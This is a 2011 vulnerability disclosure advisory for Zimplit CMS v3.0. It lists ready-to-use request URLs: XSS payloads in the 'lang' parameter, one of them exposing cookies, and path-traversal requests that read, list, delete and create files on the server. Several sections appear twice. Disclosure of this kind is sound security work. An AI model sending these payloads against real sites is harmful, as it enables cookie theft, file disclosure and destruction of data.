SSCHADV2011-012 - Multiple vulnerabilities in Zimplit CMS
Advisory: | Multiple vulnerabilities in Zimplit CMS |
Advisory ID: | SSCHADV2011-012 |
Author: |
Stefan Schurtz
|
Affected Software: | v3.0 |
Vendor URL: | |
Vendor Status: | informed |
CVE-ID: | - |
======================
Vulnerability Description:
======================
The Zimplit CMS is prone to multiple vulnerabilities.
Vulnerability Description:
======================
The Zimplit CMS is prone to multiple vulnerabilities.
==============
Technical Details:
==============
Cross-Site-Scripting
http://<target>/zimplit.php?lang=<script>alert(XSS)</script>
http://<target>/zimplit.php?lang=<script>alert(document.cookie)</script>
There are some LFI possibilities with the zimplit.php file
it´s possible to read some files on the system
http://<target>/zimplit.php?action=load&file=../../<file.txt>
browse the filesystem
http://<target>/zimplit.php?action=listAllFiles&file=../../../../
delete files
http://<target>/zimplit.php?action=delete&file=../<file>
create files
http://<target>/zimplit.php?action=new&file=../<file>
=====
Solution:
=====
-
================
Disclosure Timeline:
================
04-Sep-2011 – informed developers
05-Sep-2011 – Release date of this security advisory
Technical Details:
==============
Cross-Site-Scripting
http://<target>/zimplit.php?lang=<script>alert(XSS)</script>
http://<target>/zimplit.php?lang=<script>alert(document.cookie)</script>
There are some LFI possibilities with the zimplit.php file
it´s possible to read some files on the system
http://<target>/zimplit.php?action=load&file=../../<file.txt>
browse the filesystem
http://<target>/zimplit.php?action=listAllFiles&file=../../../../
delete files
http://<target>/zimplit.php?action=delete&file=../<file>
create files
http://<target>/zimplit.php?action=new&file=../<file>
=====
Solution:
=====
-
================
Disclosure Timeline:
================
04-Sep-2011 – informed developers
05-Sep-2011 – Release date of this security advisory
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.zimplit.com/
http://www.rul3z.de/advisories/SSCHADV2011-012.txt
Comments
Display comments as Linear | Threaded